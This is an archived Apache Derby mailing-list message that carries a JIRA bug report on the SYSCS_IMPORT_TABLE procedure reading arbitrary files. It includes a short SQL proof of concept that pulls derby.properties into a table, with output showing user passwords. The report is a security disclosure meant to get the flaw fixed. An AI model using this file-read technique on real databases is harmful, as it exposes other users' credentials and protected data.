db-derby-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Daniel John Debrunner (JIRA)" <j...@apache.org>
Subject [jira] Created: (DERBY-2436) SYSCS_IMPORT_TABLE can be used to read derby files
Date Fri, 09 Mar 2007 18:31:10 GMT
SYSCS_IMPORT_TABLE can be used to read derby files
--------------------------------------------------

                 Key: DERBY-2436
                 URL: https://issues.apache.org/jira/browse/DERBY-2436
             Project: Derby
          Issue Type: Bug
          Components: Security
            Reporter: Daniel John Debrunner
            Priority: Critical


There are no controls over which files SYSCS_IMPORT_TABLE can read, thus allowing any user
that has permission to execute the procedure to try and access information that they have
no permissions to do so. E.g. even with the secure-by-default network server I can execute
three lines of SQL to view to contents of derby.properties, thus seeing passwords of other
users, or the address of the ldap server.

create table t (c varchar(32000));
CALL SYSCS_UTIL.SYSCS_IMPORT_TABLE(NULL, 'T', 'derby.properties', NULL, NULL, 'ISO8859_1',
0);

ij> select * from T;
C

----------------------------------------------
derby.connection.requireAuthentication=true
derby.authentication.provider=BUILTIN
derby.user.SA=sapwd
derby.user.MARY=marypwd

Also a similar trick could be attempted against the actual data files, allowing a user to
attempt to bypass grant/revoke security, especially no that binary data can be exported/imported.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.


Mime
View raw message